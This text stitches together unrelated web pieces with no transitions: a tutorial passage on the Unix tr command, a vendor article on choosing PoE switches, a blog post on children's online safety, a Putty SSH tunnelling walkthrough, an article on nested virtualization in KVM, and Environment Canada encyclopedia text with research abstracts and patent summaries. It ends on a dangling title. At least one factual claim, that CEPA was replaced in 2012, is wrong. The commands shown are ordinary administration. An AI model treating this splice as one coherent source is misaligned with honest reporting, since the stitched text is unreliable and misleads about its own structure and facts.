Notice that tr didn't get passed the original file as an argument. Rather, it received originalfile's content via STDIN. In this example, the first "set" was the lowercase a-z, and the second was the uppercase translation. That's how it works: it takes input from somewhere and translates it using the first set to find what'll be changed, and the second set to determine what it'll be changed into. Here's another example of tr using STDIN:

echo "0123456789" | tr "0-9" "a-z"

Here, we took text given to us from echo and handed it to tr via a pipe. So again, that's how you get tr to process information, via STDIN, not through passing it a filename. Anyway, point made.

One of the most powerful options that tr offers is the -d switch, which tells tr to delete something. Ever had a garbage character showing up all throughout a file that you wanted to get rid of in one fell swoop? Well, this is a very fast way to do it. One example would be deleting the carriage return characters from Windows-formatted files to make them look correct in *Nix:

tr -d '\r' < windowsfile > nixfile  # delete the carriage returns

One interesting option is the ability to "squeeze" a sequence of identical characters into a single instance of it. So, if you had the string 'xxx', squeezing it would make it simply 'x'. This command, for example, would remove runs of consecutive newlines from a file and leave you with just one at a time:

tr -s '\n' < goodfile > betterfile

tr also has the ability to sterilize files by using the -c switch in conjunction with the -d switch. What the -c switch does is take the complement of the supplied set. This is best shown with an example like the one below:

tr -dc 'a-zA-Z\t\n ' < input > output

The complement means "the other part of", or the part that completes what you've given. An easy way to think of it when used with the -d (delete) switch is, "Delete everything except these characters." So in the line above we deleted everything except the upper- and lowercase alphabet, tabs, newlines, and spaces (ASCII number 32, included as the literal space at the end of the set). This is useful for applying a "default deny" policy when cleaning a file, i.e. instead of deleting certain things from a file, you instead delete everything except a few characters that you explicitly allow.

tr can even do simple obfuscation such as ROT13:

echo "all your base are tired of this meme" | tr 'a-z' 'n-za-m'
nyy lbhe onfr ner gverq bs guvf zrzr

There are a number of other options for the command, but this brief writeup covers the basics. Of course, if you're ever in need of more detail, just consult the man page.
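The behaviors described above can be verified quickly from any shell; the input strings here are made up purely for illustration:

```shell
# One variable per tr feature: translate, squeeze, delete, and ROT13.
upper=$(printf 'hello' | tr 'a-z' 'A-Z')      # translation: hello -> HELLO
squeezed=$(printf 'xxx-yyy' | tr -s 'xy')     # squeeze repeats: xxx-yyy -> x-y
digits=$(printf 'a1b2c3' | tr -d 'a-z')       # delete lowercase: a1b2c3 -> 123
rot13=$(printf 'meme' | tr 'a-z' 'n-za-m')    # ROT13: meme -> zrzr
echo "$upper $squeezed $digits $rot13"
```

Note the use of printf rather than echo inside the command substitutions: it avoids the trailing newline, so each variable holds exactly the translated string.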
Power over Ethernet (PoE) lets Ethernet cables supply power to network devices while transmitting data in the normal way. Typical PoE users are businesses adding to their network or adding VoIP phones in buildings where new power lines would be expensive or inconvenient. So why not choose a PoE switch? PoE switches give you an easy way to add PoE devices to your network. The plug-and-play switches will automatically detect whether connected devices are PoE or PoE+ and send power accordingly. Choose managed PoE switches to control multiple devices from the data center. For simpler operations, more economical unmanaged PoE switches are enough. Now, let's get close to PoE and PoE switches.

What Is Power over Ethernet?

Power over Ethernet is a technology that lets network cables carry electrical power. For example, a digital security camera normally requires two connections to be made when it is installed. One is a network connection, in order to be able to communicate with video recording and display equipment. The other is a power connection, to deliver the electrical power the camera needs to operate. However, if the camera is PoE-enabled, only the network connection needs to be made, as it will receive its electrical power from this cable as well. Currently, there are two standards approved by the IEEE. The first, approved in 2003, is IEEE 802.3af and specifies up to 15.4 watts of direct current (DC) power. The second standard, ratified in 2009 as IEEE 802.3at, is commonly called high power PoE (HPoE) or PoE+ and doubles the power capabilities to 30 watts. Both standards have a maximum distance of 100 meters (328 feet), which is dictated by the distance limitation of Ethernet network cable. The 48VDC voltage used in plain old telephone service (POTS) analog circuits is what is commonly used for today's PoE systems.
Upgrade to PoE with a PoE Switch

A basic PoE-based system usually consists of three main components: power-sourcing equipment (PSE), such as a PoE switch; category network cable; and remote powered devices, which may be an IP camera, IP access panel, IP intercom, VoIP phone or wireless access point (WAP). The PSE is the most critical one among them: it is a device that injects power onto the same network cable that is being used for data. The injector can be a stand-alone single-port or multiport device, or it can be built into a network switch, which is then called a PoE switch. The second option is more common today due to the convenience of using a single integrated device. A PoE switch is not just handling data transmission, but also serving as the centralized power source for a video surveillance system. Therefore, upgrading your network to PoE is straightforward: you just need to choose a PoE switch.

How to Choose a PoE Switch?

Although PoE is primarily designed as a plug-and-play technology, not all PoE switches are designed to deliver the full demands of maximum PoE on each port. PoE switches are sold at different price points and for different applications, from low-cost unmanaged edge switches with a few ports, up to complex multi-port rack-mounted units with sophisticated management. It's easy to make a purchase decision based on the lowest price. However, a cheaper PoE switch will typically have a less robust power supply and may not provide the full power required by PoE endpoints. Therefore, selecting the right PoE switch for a job can be challenging. Following is some simple guidance that might help. Firstly, you should make sure how many ports you need to support your PoE devices. After finding a PoE switch that will provide suitable power conditions on a per-port basis, there is another element to consider: power budget. For example, if you bought four cameras, you bought them to use all four, not just one or two.
Then will the switch you choose provide enough power per port for each camera? Will the switch provide suitable power to all ports at all times? Finally, after considering space in your panel, the power demands of each device, the power a switch can deliver on one port, and the power a switch can deliver across all ports, you are prepared to make a decision! The power consumption for PoE switches can add up quickly when there are multiple IP cameras, access control devices, outdoor heaters/blowers, etc. The key to choosing the right PoE switch is to make sure that the network switch can provide the necessary wattage of PoE for each device, and that the aggregate wattage necessary to power all devices simultaneously is available. Fiberstore provides PoE switches in a variety of specifications, which may make your selection as easy as possible. For more information, please feel free to contact us at firstname.lastname@example.org.
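The per-port versus aggregate distinction can be sketched with simple arithmetic. The wattages below are illustrative assumptions, not figures from any particular switch datasheet:

```shell
# Do four PoE+ cameras fit within a switch's total PoE power budget?
cameras=4
watts_per_port=30     # 802.3at (PoE+) maximum per port
switch_budget=150     # hypothetical total PoE budget of the switch, in watts
needed=$(( cameras * watts_per_port ))
if [ "$needed" -le "$switch_budget" ]; then
    verdict="fits: ${needed}W needed of ${switch_budget}W budget"
else
    verdict="over budget: ${needed}W needed, ${switch_budget}W available"
fi
echo "$verdict"
```

Even when each port can individually deliver 30 W, a switch with, say, a 120 W total budget could power these four cameras and nothing else, which is why the aggregate check matters as much as the per-port rating.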
When you consider all types of devices with online connectivity -- mobile phones, gaming consoles, tablets, laptops, PCs, smart TVs, e-readers, etc. -- there is a good chance you are online as much, if not more, than you are offline. If you are a parent of a young child, then you probably have purchased techy toys for either fun or for learning; as your child grows, you must also decide at what age your child can go online, for how long, where, and for what purposes. Microsoft asked 1,000 adults, both parents and non-parents, "How old is too young for kids to go online unsupervised?" The answer: eight years old is the average age at which parents allow independent Internet and device use. Ninety-four percent of parents said they allow their kids unsupervised access to at least one device or online service like email or social networks. The poll found that most parents allow their kids access to gaming consoles and computers at age eight. However, when it comes to kids under the age of seven?

- 41% of parents allow them to use a gaming console unsupervised.
- 40% allow unsupervised access to a computer.
- 29% allow them to use mobile apps unsupervised.

The poll also asked about teaching online safety to kids. Eighty-nine percent of people without kids and 74% of parents "agree that parents should provide online safety guidance." Are you flipping kidding me? If an eight-year-old child is online, unsupervised, without safety guidance, then that seems like a recipe for disaster. And kids installing mobile apps without supervision... does that mean they know all about checking out the permissions that apps ask for and what is and is not acceptable? Microsoft's survey found that the average age is between 11 and 12 for kids to start using mobile phones, texting and social networks, which could still potentially be disastrous without some kind of parental online safety guidance.
For example, a 14-year-old girl and a 12-year-old girl were charged with aggravated stalking of a 12-year-old girl who committed suicide by jumping from the third floor of an abandoned cement plant tower. When the father of the 14-year-old was asked about his daughter's malicious harassing and cyberbullying, he told The Associated Press, "None of it's true. My daughter's a good girl and I'm 100% sure that whatever they're saying about my daughter is not true." Oh really? Maybe the dad should check out his daughter's bragging on Facebook. "'Yes, I bullied Rebecca and she killed herself but I don't give a ...' and you can add the last word yourself," quoted the sheriff from the girl's Facebook post. Does unsupervised device and social network usage, with or without online safety guidance, still seem wise? People without kids named ages an average of two to three years older as acceptable for allowing device usage, meaning parents are less strict and "may be cooler than kids think." Some parents choose to use parental controls to limit their kids' Internet access, as seen in the "how old is too young to go online" debate on HardForum. Knowledge is power, and the Internet can teach kids all manner of topics, including teaching future hackers how to get around parental controls. Other parents reach out to other geeks for answers, including help in choosing "a suitable mobile phone for a four-year-old." So how old is too young for kids to go online? Microsoft's Kim Sanchez, Director of Online Safety, wrote, "There is no magic age, but rather, parents should take into consideration the appropriateness for their individual family and responsibility or maturity level of their child." Although there may be no "correct" answer about what age you should allow your child to use different devices with or without supervision, you might be surprised as to whom parents and non-parents say is responsible for teaching kids about online safety.
51% of parents suggested that teaching online safety is the responsibility of teachers; 28% said it should be tech companies or relatives; 25% said such guidance should come from friends; and 22% of parents want to leave it to the government! Come on, folks, this isn't the sex talk; it isn't taboo -- it's online safety! Teaching kids about online "stranger danger," thinking before clicking links or opening email from someone they don't know, covering the web cam when not in use, thinking before sharing any idea that pops into their heads on social networks or in texts, thinking before accepting every new friend or follower, and thinking before sharing every picture they take is as important as teaching kids not to take candy or rides from strangers. Sure, there are great people online, but there are also cyberstalkers and those who are truly evil... they hope you don't teach your kids about being safe online.

Follow me on Twitter @PrivacyFanatic
Create your own Virtual Private Network for SSH with Putty

I have multiple Linux machines at my home. Previously, when I needed SSH access to these machines, I used to set up port forwarding on my router to each of them. It was a tedious process of enabling port forwarding and then disabling it after use. It was also difficult to remember the port number forwarded for a particular machine. But now I found a cooler way to get SSH access to all my machines at home without setting up port forwarding or remembering any port numbers, and most importantly, I can address my home machines with local subnet IP addresses, no matter where on the internet I connect from.

Requirements:
- Remote machine with Putty installed on it.
- Home router's internet-accessible IP address or dynamic DNS (DDNS) address.
- One or more Linux/Windows machine(s) to which direct SSH access is required.
- On the router, port forwarding enabled for SSH service to at least one of these machines.

The basic idea to get this working is that we make one initial SSH connection to our home machine. Then, using this connection as a tunnel, we can connect to any machine at home by addressing it with its local sub-network address (such as 192.168.x.x). So the high-level steps are:

- Open a Putty session and configure it to act as a tunnel.
- From this session, connect to your default SSH server at home.
- Open another Putty session and configure it to use the previous Putty session as a proxy.
- SSH connect to any machine at home using its local subnet IP address. Since we are using a proxy, it will resolve the local subnet's IP address properly.
- You can make any number of connections to all your home machines by just repeating steps (3) and (4).

Note: If the remote network's subnet is the same as your home network's subnet, then you might run into IP conflicts.

1) On the remote system, open Putty and enter the IP address or dynamic DNS (DDNS) name in the host name field. Select "SSH" as the connection type.
Port 22 will be selected, which can be left alone unless you run the SSH service on a different port. Note: Though your Putty screen might look a little different than the one seen here due to version differences, the basic steps would still be the same. In our example, Host Name = demo123.dyndns.org

2) In Putty, on the left-hand navigation panel, open the SSH option and select "Tunnels". In the tunnels screen, set these values:

Source Port: 3000 (this is the port at which our proxy service listens; this port can be changed to anything, but preferably a number larger than 1024)
Destination Port: (Leave Blank)

Finally, select "Dynamic" from the radio button options.

3) Important: Click "Add" to add the tunnel settings to the connection.

4) On the left-hand navigation panel, move the scrollbar to the top and click "Session". You will see the settings entered in step (1). Now we can save the whole connection settings. Add a name for this connection in the saved sessions textbox and click save.

5) Click open to open the connection to the home machine, and enter login and password information for the remote machine. This user need not be the root user, but it needs to be a user with network access on the remote machine. That brings us to the end of the Putty configuration. Now you have a proxy tunnel connection from the remote machine to one of the home machines, and we are ready to connect to any home machine.

6) Open another Putty session. Select the "Proxy" option from the navigation panel. On the right-side proxy options, enter only the following information. Don't change any other settings.

Proxy type: select "SOCKS 4"
Proxy hostname: enter "localhost"
Port: 3000

7) Click on the "Session" option from the navigation panel. Enter a name under the "Saved Sessions" text field. Don't enter any information in the "Host Name" field. Now click "Save". Now we have a template connection session using our proxy.

8) Now enter the local subnet IP address of a machine at home and click open.
The connection gets routed through the proxy tunnel, and you will be connected to the home machine directly. Similarly, you can connect to another home machine by opening Putty, loading the template we created, and just filling in that machine's local subnet IP address. BTW, if you think just SSH access is not cool enough, you can do more cool stuff like:

- Listening to music stored at home
- Viewing/sharing photos with friends and family
- Creating schedules, todos, notes, etc., securely on a home computer
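For readers not on Windows, the same two-stage setup can be sketched with the OpenSSH client instead of Putty. This is an illustrative config fragment, not part of the original walkthrough; the host name and subnet are the same placeholders used above:

```
# ~/.ssh/config -- hypothetical OpenSSH equivalent of the Putty setup

# Steps 1-5: the tunnel session ("ssh home-gateway" opens the SOCKS proxy
# on local port 3000, like Putty's Dynamic forward).
Host home-gateway
    HostName demo123.dyndns.org
    DynamicForward 3000

# Steps 6-8: any home machine, reached through the SOCKS tunnel.
# Requires the OpenBSD netcat (nc) for its SOCKS client flags.
Host 192.168.*
    ProxyCommand nc -X 5 -x localhost:3000 %h %p
```

With the first session running, `ssh 192.168.1.20` then connects straight to that home machine through the tunnel, much like loading the saved Putty template and filling in the address.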
Ten years ago, when the topic of the "cloud" was first being introduced, the focus was on simple services within a public infrastructure. But as is typical in technology, these services evolve with their use models. Similarly, the introduction of virtualization on commodity hardware also focused on the simplest usage models, but then evolved as the potential was better understood. As hardware providers saw the growth of virtualization and the cloud, they also evolved their offerings to more efficiently support the needs. Early x86 processors were not ideal for virtualization, but processor internals have focused on these new usage models and created a more efficient environment for platform virtualization. Let's begin with a short introduction to cloud architectures and some of the limitations they bring.

Public cloud architectures

Public clouds, or publicly available virtualized infrastructure, are focused on the simple allocation of virtual servers as carved out by a hypervisor for multitenant use. The hypervisor acts as a multiplexer, making a physical platform shareable among multiple users. Multiple offerings are available for hypervisors, from the Kernel Virtual Machine (KVM) to the Xen hypervisor and many others. One limitation that exists within virtualized infrastructures is their dependence on a given virtual environment. Amazon Elastic Compute Cloud (Amazon EC2), for example, relies on Xen virtualization. Amazon EC2 expects that any guests that run within its infrastructure will be packaged in a specific way called the Amazon Machine Image (AMI) format. The AMI is the fundamental unit of deployment within Amazon EC2 and can be one of many preconfigured types (based on operating system and application set) or a custom creation with some additional effort. This virtual machine (VM) format (which consists of metadata and a virtual disk format) can be an obstacle for cloud users.
The ability to migrate VMs from private infrastructure to public infrastructure or between public cloud infrastructures is obstructed by this format and by dependence on the target's hypervisor choice. Therefore, support for nested virtualization creates a new abstraction for cloud users. If clouds support the ability to virtualize a hypervisor on top of another hypervisor, then the VM format becomes irrelevant to the cloud. The only dependence is the format of the guest hypervisor itself. This change evolves first-generation clouds from one-size-fits-all propositions into highly flexible virtualized infrastructures with greater freedom for their users. Figure 1 illustrates the new abstraction in the context of virtual platforms for hypervisors, not just VMs. Note in this figure the nomenclature for the levels of virtualization: L0 represents the bare-metal hypervisor, L1 the guest hypervisors, and L2 the guest VMs.

Figure 1. Simple illustration of traditional hypervisors vs. nesting hypervisors

This change creates the ability not simply to package VMs for new infrastructures but to package sets of VMs with their hypervisor, simplifying the ability for users of private cloud infrastructures to migrate functionality (either statically or dynamically) to public cloud infrastructure. This change is shown in Figure 2, with the translation of the private hypervisor into the guest hypervisor in the nested cloud.

Figure 2. Guest hypervisor and host hypervisors in the nested cloud

Next-generation clouds: Introducing nested virtualization

Nested virtualization is not a new concept but one that has been implemented for some time in the IBM® z/VM® hypervisor. z/VM is itself an operating system that acts as a hypervisor, running on IBM System z® hardware and virtualizing not just processors and memory but also storage, networking hardware assists, and other resources. The z/VM hypervisor represents the first implementation of practical nested virtualization with hardware assists for performance.
Further, the z/VM hypervisor supports any depth of nesting of VMs (with additional overhead, of course). More recently, x86 platforms have been driven toward virtualization assists based on the growing usage models for the technique. The first hypervisor for commodity hardware to implement nested virtualization was the KVM. This addition to KVM was performed under IBM's Turtles project and permitted multiple unmodified hypervisors to run on top of KVM (itself a hypervisor built as a tweak of the Linux® kernel). The Turtles project was motivated in part by a desire to use commodity hardware in a way that IBM pioneered for IBM System p® and System z operating systems. In this model, the server runs an embedded hypervisor and allows the user to run the hypervisor of his or her choice on top of it. The approach has gained interest from the virtualization community, as the capabilities (modifications to KVM) are now part of the mainline Linux kernel.

Architecture for nested virtualization

Nested virtualization introduces some unique problems not seen before. Let's explore some of these issues and how they've been addressed within KVM. A disadvantage of current virtualization support in processor architectures is the focus on dual-level virtualization (VMs stacked on a single hypervisor). Turtles stretches this support through the simple process of multiplexing. Recall from Figure 1 that three levels exist (L0 as the host hypervisor, L1 as the guest hypervisor, and L2 as the guest VM). With today's processors, L0 and L1 are efficiently handled, but efficiency is lost at L2. Rather than maintaining this strict stacking, Turtles multiplexes entities at L1 and in essence allows the host hypervisor to multiplex the guest hypervisor and guest VMs at L1. Therefore, rather than virtualizing the virtualization instructions, the hardware assists available in the processor are used efficiently to support the three layers (see Figure 3).

Figure 3.
Multiplexing guests on the host (L0) hypervisor

But exploiting the virtualization assists of the processor was not the only obstacle. Let's explore some of the other issues and their solutions within KVM. Nested virtualization introduces some interesting problems in this space. Note that traditional virtualization partly addresses the instruction set, directly executing certain instructions on the processor and emulating others through traps. In nested virtualization, another level is introduced at which certain instructions continue to execute directly on hardware and others are trapped but managed in one layer or another (with the overhead of transitioning between the layers). This setup has exposed strengths and weaknesses in the processor implementations of virtualization, as the Turtles project found. One such area was management of VM control structures (VMCSs). In Intel's implementation, reading and writing these structures involves privileged instructions that require multiple exits and entries across the layers of the nested stack. These transitions introduce overhead, which is expressed as loss of performance. AMD's implementation manages VMCS through regular memory reads and writes, which means that when a guest hypervisor (L1) modifies a guest VM's VMCS (L2), the host hypervisor (L0) is not required to intervene. Without processor support for nesting, the Turtles approach to multiplexing also minimizes transitions between layers. Transitions in virtualization occur through special instructions to enter or exit VMs (VMentry and VMexit) and are expensive. Certain exits require that the L1 hypervisor be involved, but other conditions (such as external interrupts) are handled solely by L0. Minimizing some of the transitions from L2 to L0 to L1 results in improved performance.

MMU and memory virtualization

Prior to page table assists in modern processors, hypervisors emulated the behavior of the memory management unit (MMU).
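Before getting into how the hypervisor emulated the MMU, it helps to see what any scheme must accomplish: translating a guest virtual address through two stages, guest virtual to guest physical to host physical. Here is a toy Python sketch; the mappings and flat-dict "page tables" are invented for illustration (real hardware walks multi-level radix trees), so treat it as a model of the translation, not of any hypervisor's code.

```python
PAGE = 4096  # 4 KiB pages

# Stage 1: the guest's own page table, mapping guest-virtual page
# numbers to guest-physical page numbers (entries invented).
guest_page_table = {0x10: 0x2A, 0x11: 0x2B}

# Stage 2: the hypervisor's table (EPT/NPT-style), mapping
# guest-physical page numbers to host-physical page numbers.
extended_page_table = {0x2A: 0x91, 0x2B: 0x92}

def translate(gva: int) -> int:
    """Translate a guest virtual address to a host physical address."""
    page, offset = divmod(gva, PAGE)
    gpa_page = guest_page_table[page]          # stage 1: guest mapping
    hpa_page = extended_page_table[gpa_page]   # stage 2: hypervisor mapping
    return hpa_page * PAGE + offset

print(hex(translate(0x10 * PAGE + 0x123)))  # -> 0x91123
```

Without hardware support, the hypervisor must maintain a precomputed composite of the two tables (a shadow page table) and trap every guest update to stage 1 to keep it consistent; with EPT/NPT, the processor walks both stages itself.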
Guest VMs created guest page tables to support their translation of guest virtual addresses into guest physical addresses. The hypervisor maintained shadow page tables to translate guest physical addresses into host physical addresses. All of this required trapping changes to the page tables so that the hypervisor could manage the physical tables in the CPU. Intel and AMD solved this issue through the addition of two-dimensional page tables, called extended page tables (EPTs) by Intel and nested page tables (NPTs) by AMD. These assists allow the secondary page tables to translate guest physical addresses to host physical addresses (while the traditional page tables continue to support guest virtual-to-guest physical translation).

The Turtles project introduced three models to deal with nesting. The first and least efficient is the use of shadow page tables on top of shadow page tables. This option, in which both the guest and host hypervisors maintain shadow tables, is used only when hardware assists are not available. The second method uses shadow tables over the two-dimensional page tables, which are managed by L0. Although more efficient, page faults in the guest VM result in multiple L1 exits and overhead. The final method virtualizes the two-dimensional page tables for the L1 hypervisor. By emulating the secondary page tables in L1 (where L0 uses the physical EPT/NPT), there are fewer L1 exits and less overhead. This innovation from the Turtles project was called multidimensional paging.

I/O device virtualization

Virtualizing I/O devices can be one of the most costly aspects of virtualization. Emulation (as provided by QEMU) is the costliest, whereas approaches like paravirtualization (making the guest aware and coordinating I/O with the hypervisor) can improve overall performance.
The most efficient scheme uses hardware assists such as the AMD I/O MMU (IOMMU) to provide transparent translation of guest physical addresses to host physical addresses (for operations such as direct memory access [DMA]). The Turtles project improved performance by giving the L2 guest direct access to the physical devices available to L0. The L0 host hypervisor emulates an IOMMU for the L1 guest hypervisor. This approach minimizes guest exits, resulting in reduced overhead and improved performance.

Nesting within KVM has been found to carry modest overhead, depending on the use model. Workloads that drive VM exits (such as external interrupt processing) tend to be the worst offenders, but the optimizations within KVM keep the overhead to between 6% and 14%. This overhead is certainly reasonable given the new capabilities that nested virtualization provides. Advancements in processor architectures will likely improve on this further.

Where can you find nested virtualization?

Today, a number of hypervisors support nested virtualization, though not as efficiently as they could. The Linux KVM supports nesting on recent virtualization-enabled processors. The Xen hypervisor has also been modified to support nested virtualization, so the open source community has quickly moved to adopt this capability and its potential usage models. From a production standpoint, it's safe to say that this capability is in the early stages of development. In addition, scaling virtualization with nesting implies heavier loading on the physical host and therefore should use servers with more capable processors. Note also that it's possible to perform nested virtualization in other contexts. In a recent OpenStack article, nesting was demonstrated using VirtualBox as the host hypervisor and QEMU (providing emulation) as the guest. Although not the most efficient configuration, the article demonstrates the basic capability on more modest hardware. See Resources for more details.
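On a Linux host, whether KVM nesting is switched on can be read from the `nested` module parameter that the in-kernel KVM modules expose through sysfs. A small sketch, assuming the usual `kvm_intel`/`kvm_amd` module names and parameter path (adjust for your kernel and distribution):

```python
from pathlib import Path

def parse_nested(value: str) -> bool:
    """Interpret the kvm module's 'nested' parameter value.

    Newer kernels report Y/N; older ones report 1/0.
    """
    return value.strip() in ("Y", "y", "1")

def nested_kvm_enabled() -> bool:
    # The parameter lives under kvm_intel on Intel hardware and
    # kvm_amd on AMD hardware; neither file exists if the module
    # is not loaded.
    for module in ("kvm_intel", "kvm_amd"):
        param = Path("/sys/module") / module / "parameters" / "nested"
        if param.exists():
            return parse_nested(param.read_text())
    return False

if __name__ == "__main__":
    print("nested virtualization enabled:", nested_kvm_enabled())
```

If the check reports False, nesting can typically be enabled by reloading the module with `nested=1`, though the exact procedure varies by distribution.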
A hypervisor shipped as a standard part of the firmware on a desktop or server may be commonplace in the future. This usage model implies that the embedded hypervisor can support an operating system (as a VM) or another hypervisor of the user's choice. Using a hypervisor in this fashion also enables new security models (as the hypervisor exists underneath both the user's and the attacker's code). This concept was originally used for nefarious purposes. The "Blue Pill" rootkit was an exploit from Joanna Rutkowska that inserted a thin hypervisor underneath a running instance of an operating system. Rutkowska also developed a technique called Red Pill that could be used to detect when a "Blue Pill" had been inserted below a running operating system.

The Turtles project proved that nested virtualization of hypervisors was not only possible but efficient under many conditions, using the KVM hypervisor as a test bed. Work has continued with KVM, and it is now a model for the implementation of nesting within a hypervisor, supporting the execution of multiple guest hypervisors simultaneously. As processor architectures catch up with these new requirements, nested virtualization could be a common usage model in the future, not only in enterprise servers in next-generation cloud offerings but on commodity servers and desktops.

Resources

- The Turtles Project: Design and Implementation of Nested Virtualization is a useful read on how IBM Research Haifa and the IBM Linux Technology Center modified and optimized the KVM to support nested virtualization. Also interesting is the OSDI presentation on Turtles.
- The paper Architecture of Virtual Machines by R. P. Goldberg was one of the earliest definitions of recursive VMs. The paper is quite old (from 1973) but well worth a read.
- Blue Pill and Red Pill were introduced by Joanna Rutkowska in 2006. Blue Pill was a malware approach to inserting a thin hypervisor underneath a running operating system as a rootkit.
The source code to Blue Pill has never been publicly released.
- The Linux KVM was the first hypervisor to be mainlined into the Linux kernel. KVM is an efficient, production-quality hypervisor that is widely used in the virtualization community. You can learn more about KVM in Discover the Linux Kernel Virtual Machine (M. Tim Jones, developerWorks, April 2007).
- As another demonstration of the flexibility of the Linux kernel, the modifications for KVM translate Linux from a desktop and server kernel into a full-featured hypervisor. Learn more in Anatomy of a Linux hypervisor (M. Tim Jones, developerWorks, May 2009).
- OpenStack is an Infrastructure as a Service cloud offering that takes advantage of nested virtualization. In the article Cloud computing and storage with OpenStack you can see a demonstration of nested virtualization with emulation (running QEMU on VirtualBox).
Environment Canada, legally incorporated as the Department of the Environment under the Department of the Environment Act, is the department of the Government of Canada with responsibility for coordinating environmental policies and programs as well as preserving and enhancing the natural environment and renewable resources. The powers, duties and functions of the Minister of the Environment extend to and include matters relating to: "preserve and enhance the quality of the natural environment, including water, air, soil, flora and fauna; conserve Canada's renewable resources; conserve and protect Canada's water resources; forecast daily weather conditions and warnings, and provide detailed meteorological information to all of Canada; enforce rules relating to boundary waters; and coordinate environmental policies and programs for the federal government." Its ministerial headquarters is located in les Terrasses de la Chaudière, Gatineau, Quebec.

Under the Canadian Environmental Protection Act (CEPA), Environment Canada became the lead federal department to ensure the cleanup of hazardous waste and oil spills for which the government is responsible, and to provide technical assistance to other jurisdictions and the private sector as required. The department is also responsible for international environmental issues. CEPA was the central piece of Canada's environmental legislation but was replaced when a budget implementation bill entered into effect in June 2012.

Under the Constitution of Canada, responsibility for environmental management in Canada is shared between the federal government and provincial/territorial governments. For example, provincial governments have primary authority for resource management, including permitting industrial waste discharges. The federal government is responsible for the management of toxic substances in the country.
Environment Canada provides stewardship of the Environmental Choice Program, which provides consumers with an eco-label for products manufactured within Canada, or services, that meet the international label standards of the Global Ecolabelling Network. Environment Canada continues to undergo a structural transformation to centralize authority and decision-making, and to standardize policy implementation. (Source: Wikipedia.)

Dempsey F., Environment Canada. Bulletin of the American Meteorological Society | Year: 2013

Frank Dempsey suggests that various remote-sensing, analysis, and forecasting methods allow anticipation of the harmful increases in airborne fine particulates and ozone pollution caused by the plumes of distant fires. The recognition and forecasting of trajectories of smoke plumes from active fires will be beneficial for anticipating and predicting potential effects on air quality in eastern North America. The author highlights a case in which distinct increases in concentrations of fine particles and O3, closely correlated with the plume from a distant wildfire, were observed in routinely collected air quality observations in Ontario's air monitoring network. The specific data that indicate detection of smoke from northern sources are the air quality observations from various locations in southern Ontario. Several more examples are also presented to demonstrate the benefits of recognizing and forecasting the trajectories of smoke plumes in anticipating and predicting potential effects on air quality.

Reiner E.J., Environment Canada. Mass Spectrometry Reviews | Year: 2010

The analysis of polychlorinated dibenzo-p-dioxins, polychlorinated dibenzofurans, polychlorinated biphenyls, and other related compounds requires complex sample preparation and analytical procedures using highly sensitive and selective state-of-the-art instrumentation to meet very stringent data quality objectives.
The analytical procedures (extraction, sample preparation), instrumentation (chromatographic separation and detection by mass spectrometry) and screening techniques for the determination of dioxins, furans, dioxin-like polychlorinated biphenyls and related compounds, with a focus on new approaches and alternate techniques to standard regulatory methods, are reviewed. © 2009 Wiley Periodicals, Inc.

Boer G.J., Environment Canada. Climate Dynamics | Year: 2011

Decadal prediction of the coupled climate system is potentially possible given enough information and knowledge. Predictability will reside both in externally forced and in long-timescale internally generated variability. The "potential predictability" investigated here is characterized by the fraction of the total variability accounted for by these two components in the presence of short-timescale unpredictable "noise" variability. Potential predictability is not a classical measure of predictability nor a measure of forecast skill, but it does identify regions where long-timescale variability is an appreciable fraction of the total and hence where prediction on these scales may be possible. A multi-model estimate of the potential predictability variance fraction (ppvf) as it evolves through the first part of the twenty-first century is obtained using simulation data from the CMIP3 archive. Two estimates of potential predictability are used, which depend on the treatment of the forced component. The multi-decadal estimate considers the magnitude of the forced component as the change from the beginning of the century and so becomes largely a measure of climate change as the century progresses. The next-decade estimate considers the change in the forced component from the past decade and so is more pertinent to an actual forecast for the next decade. Long-timescale internally generated variability provides additional potential predictability beyond that of the forced component.
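The entry above describes the ppvf as the fraction of total variability accounted for by the predictable (forced plus long-timescale internal) components in the presence of noise variability. The paper's exact formulation is not reproduced here, but a variance fraction consistent with that description, and with the stated 0-to-1 bound and signal-to-noise form, can be sketched in Python as an illustration:

```python
def ppvf(predictable_var: float, noise_var: float) -> float:
    """Fraction of total variance accounted for by the predictable
    (forced plus long-timescale internal) components."""
    return predictable_var / (predictable_var + noise_var)

def ppvf_from_snr(snr: float) -> float:
    # Equivalent expression in terms of a signal-to-noise variance
    # ratio s = predictable_var / noise_var.
    return snr / (1.0 + snr)

print(ppvf(1.0, 3.0))      # -> 0.25
print(ppvf_from_snr(1.0))  # -> 0.5
```

By construction the fraction stays between 0 (all noise) and 1 (all predictable), matching the bounds quoted in the abstract.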
The ppvf may be expressed in terms of a signal-to-noise ratio and takes on values between 0 and 1. The largest values of the ppvf for temperature are found over tropical and mid-latitude oceans, with the exception of the equatorial Pacific, and some but not all tropical land areas. Overall, the potential predictability for temperature generally declines with latitude and is relatively low over mid- to high-latitude land. Potential predictability for precipitation is generally low and due almost entirely to the forced component, and then mainly at high latitudes. To the extent that the multi-model ppvf reflects both the behaviour of the actual climate system and the possibility of decadal prediction, the results give some indication as to where and to what extent decadal forecasts might be possible. © 2010 Her Majesty the Queen in Right of Canada.

Environment Canada | Date: 2011-06-08

Skimmers, barges and related methods recover heavy oil or bitumen from contaminated water environments such as tailings ponds. The skimmer has an articulated mesh-like conveyor driven around a drum by a drive sprocket. A pusher mechanism discharges bitumen or heavy oil from cavities in the conveyor. In one embodiment, the skimmer includes an automatic depth control system. In other embodiments, knife-edged shear plates remove heavy oil or bitumen adhering to the conveyor and drum. A barge may incorporate multiple parallel skimmers. The barge may include a bitumen-transfer pump having an annular fluid-injection flange that generates an annulus of lubricating fluid inside a discharge hose. A method of skimming heavy oil or bitumen involves using a skimmer that automatically adjusts its elevation or depth based on a control signal generated by a depth sensor. Another method recovers and transfers bitumen by lubricating the discharge hose using the annular fluid-injection flange.
Environment Canada | Date: 2012-10-16

Provided are decontamination compositions that include an ammonium compound, a ferric/ferrocyanide compound, a polyaminocarboxylic acid compound and a polycarboxylic compound. Depending on the mode of application, the compositions can be used as foams, liquids, gels, strippable coatings, mists, or in other forms. Also provided are kits that include such components, in whole or in part, along with an optional dispersing device for use of the decontamination composition.
The Geography of the Digital Universe

